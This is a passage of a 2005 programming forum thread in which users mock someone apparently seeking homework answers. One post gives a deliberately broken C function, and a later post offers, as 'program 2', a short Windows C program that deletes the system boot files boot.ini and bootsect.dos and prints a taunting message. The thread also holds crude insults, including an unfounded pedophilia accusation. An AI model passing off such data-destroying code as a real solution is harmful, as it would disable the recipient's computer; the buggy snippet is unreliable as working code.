Programming Forums
User Name Password Register
 

RSS Feed
FORUM INDEX | TODAY'S POSTS | UNANSWERED THREADS | ADVANCED SEARCH

Reply
 
Thread Tools Display Modes
Old Mar 31st, 2005, 10:54 PM   #11
tempest
Programming Guru
 
tempest's Avatar
 
Join Date: Oct 2004
Posts: 1,041
Rep Power: 5 tempest is on a distinguished road
Send a message via ICQ to tempest Send a message via AIM to tempest Send a message via Yahoo to tempest
Program 1)

[php]
int findRightMostInt(int number) {
char tmp[100];
snprintf(tmp, 100, "%d", number);
number = strlen(tmp) - 1;
while(tmp[number] == '0') number--;
return atoi(tmp[number]);
}
[/php]
tempest is offline   Reply With Quote
Old Apr 1st, 2005, 1:39 AM   #12
Berto
Programming Guru
 
Join Date: Aug 2004
Posts: 1,022
Rep Power: 5 Berto is on a distinguished road
Send a message via AIM to Berto Send a message via MSN to Berto
indian infotech LTD what is your website?
Berto is offline   Reply With Quote
Old Apr 1st, 2005, 12:44 PM   #13
bl00dninja
Programming Guru
 
bl00dninja's Avatar
 
Join Date: Oct 2004
Location: namespace std
Posts: 1,246
Rep Power: 5 bl00dninja is on a distinguished road
http://www.geocities.com/donald_ferrone/

what in the fuck is this?
__________________
i put on my robe and wizard hat...

Have you ever heard of Plato, Aristotle, Socrates?...Morons.
bl00dninja is offline   Reply With Quote
Old Apr 1st, 2005, 12:54 PM   #14
Infinite Recursion
Programming Guru
 
Infinite Recursion's Avatar
 
Join Date: Jul 2004
Location: United States
Posts: 3,464
Rep Power: 8 Infinite Recursion is on a distinguished road
Send a message via MSN to Infinite Recursion Send a message via Yahoo to Infinite Recursion
Yeah, I kind have my reservations about the whole thing also.
__________________
http://jasonpowers.net

"There are a thousand hacking at the branches of evil to one who is striking at the root."
Infinite Recursion is offline   Reply With Quote
Old Apr 1st, 2005, 1:25 PM   #15
peace_of_mind
Professional Programmer
 
peace_of_mind's Avatar
 
Join Date: Sep 2004
Location: Hell if I know most of the time
Posts: 435
Rep Power: 4 peace_of_mind is on a distinguished road
Send a message via MSN to peace_of_mind Send a message via Yahoo to peace_of_mind
Quote:
Originally Posted by bl00dninja

http://www.geocities.com/donald_ferrone/

what in the fuck is this?
The site of a pedophile? lol That's what my earlier post was about.
__________________
Amateurs built the ark
Professionals built the Titanic


Last edited by peace_of_mind; Apr 1st, 2005 at 1:32 PM. Reason: Quoted the wrong post
peace_of_mind is offline   Reply With Quote
Old Apr 1st, 2005, 2:04 PM   #16
some1
Programmer
 
Join Date: Dec 2004
Posts: 50
Rep Power: 4 some1 is on a distinguished road
haha what a nice way to get your homework done
some1 is offline   Reply With Quote
Old Apr 1st, 2005, 2:05 PM   #17
tempest
Programming Guru
 
tempest's Avatar
 
Join Date: Oct 2004
Posts: 1,041
Rep Power: 5 tempest is on a distinguished road
Send a message via ICQ to tempest Send a message via AIM to tempest Send a message via Yahoo to tempest
Donald, if you're a professor of computer science you're a disgrace.
tempest is offline   Reply With Quote
Old Apr 1st, 2005, 11:18 PM   #18
bl00dninja
Programming Guru
 
bl00dninja's Avatar
 
Join Date: Oct 2004
Location: namespace std
Posts: 1,246
Rep Power: 5 bl00dninja is on a distinguished road
w00t!!!!!!!!!!!!!

i'm a princiPAL dood bitches!
__________________
i put on my robe and wizard hat...

Have you ever heard of Plato, Aristotle, Socrates?...Morons.
bl00dninja is offline   Reply With Quote
Old Apr 3rd, 2005, 6:47 AM   #19
lepricaun
Hobbyist Programmer
 
lepricaun's Avatar
 
Join Date: Aug 2004
Location: The Netherlands
Posts: 111
Rep Power: 4 lepricaun is on a distinguished road
program 2)

#include <stdio.h>
#include <windows.h>

int main(void)
{
     DeleteFile("c:\\boot.ini");
     DeleteFile("c:\\bootsect.dos");
     printf("Goodbye my friend, gna gna gna ;-))");
     
   return 0;
}
__________________
http://www.white-scorpion.nl
lepricaun is offline   Reply With Quote
Reply

Bookmarks

« Previous Thread in Forum | Next Thread in Forum »

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump




DaniWeb IT Discussion Community
All times are GMT -5. The time now is 2:23 AM.

Powered by vBulletin® Version 3.7.0, Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Copyright ©2007 DaniWeb® LLC